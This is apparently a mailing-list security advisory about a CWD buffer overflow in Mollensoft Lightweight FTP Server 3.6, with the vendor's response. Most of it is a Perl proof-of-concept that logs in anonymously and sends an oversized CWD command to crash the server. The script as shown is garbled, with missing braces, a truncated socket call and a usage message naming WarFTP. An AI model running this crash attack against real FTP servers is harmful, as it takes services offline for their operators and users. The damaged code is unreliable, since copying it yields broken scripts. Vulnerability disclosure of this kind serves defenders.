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[Full-Disclosure] Mollensoft Lightweight FTP Server CWD Buffer Overflow

Mollensoft Lightweight FTP Server CWD Buffer Overflow 

Article reference:


STORM has discovered a security vulnerability in 
<http://www.mollensoft.com/product2.htm> Mollensoft Lightweight FTP Server. 
Mollensoft Lightweight FTP Server's support for the CWD command incorrectly 
verifies that the buffer the CWD command doesn't overflow any of its internal 
buffers. This insufficient verification allows an authenticated (anonymous or 
otherwise) user to cause the FTP server to crash while trying to read an 
arbitrary memory location by issuing a malformed CWD command. 


Vulnerable Systems: 
 * Mollensoft Lightweight FTP Server version 3.6 

 Vendor Response: 
BigAl (author) responded with the following: 
I wrote this particular app with Visual Basic and used an FTP ActiveX COM 
component and I am waiting for the component creator to get back to me 
regarding the fix. Unfortunately I cannot snip off any of the commands, as 
access to the command length is not available from the VB component using 
straight VB Code. I am working on moving to .Net so hopefully I can have a 
new FTP server out by fall time frame which is truly multi-threaded and 
totally coded by me. 
 # Mollensoft FTP Server CMD Buffer Overflow 
 # Orkut users? Come join the SecuriTeam community 
 # http://www.orkut.com/Community.aspx?cmm=44441 
 use strict; 
 use IO::Socket::INET; 
 usage() unless (@ARGV == 2); 
 my $host = shift(@ARGV); 
 my $port = shift(@ARGV); 
 # create the socket 
 my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, 
 $socket or die "Cannot connect to host!\n"; 
 # receive greeting 
 my $repcode = "220 "; 
 my $response = recv_reply($socket, $repcode); 
 print $response; 
 # send USER command 
 #my $username = "%00" x 2041; 
 my $username = "anonymous"; 
 print "USER $username\r\n"; 
 print $socket "USER $username\r\n"; 
 select(undef, undef, undef, 0.002); # sleep of 2 milliseconds 
 # send PASS command 
 my $password = "a\@b.com"; 
 print "PASS $password\r\n"; 
 print $socket "PASS $password\r\n"; 
 my $cmd = "CWD "; 
 $cmd .= "A" x 224; # Value can range from 224 to 1018 
 $cmd .= "\r\n"; 
 print "length: ".length($cmd)."\n"; 
 print $socket $cmd; 
 $repcode = ""; 
 recv_reply($socket, $repcode); 
 sub usage 
  # print usage information 
  print "\nUsage: Mollensoft_FTP_Server_crash.pl <host> <port>\n 
 <host> - The host to connect to 
 <port> - The TCP port which WarFTP is listening on\n\n"; 
 sub recv_reply 
  # retrieve any reply 
  my $socket = shift; 
  my $repcode = shift; 
  $socket or die "Can't receive on socket\n"; 
  my $res=""; 
   $res .= $_; 
   if (/$repcode/) { last; } 
  return $res; 

SecurITeam would like to thank <mailto:storm@xxxxxxxxxxxxxx> STORM for 
finding this vulnerability.

Aviram Jenik
Beyond Security Ltd.


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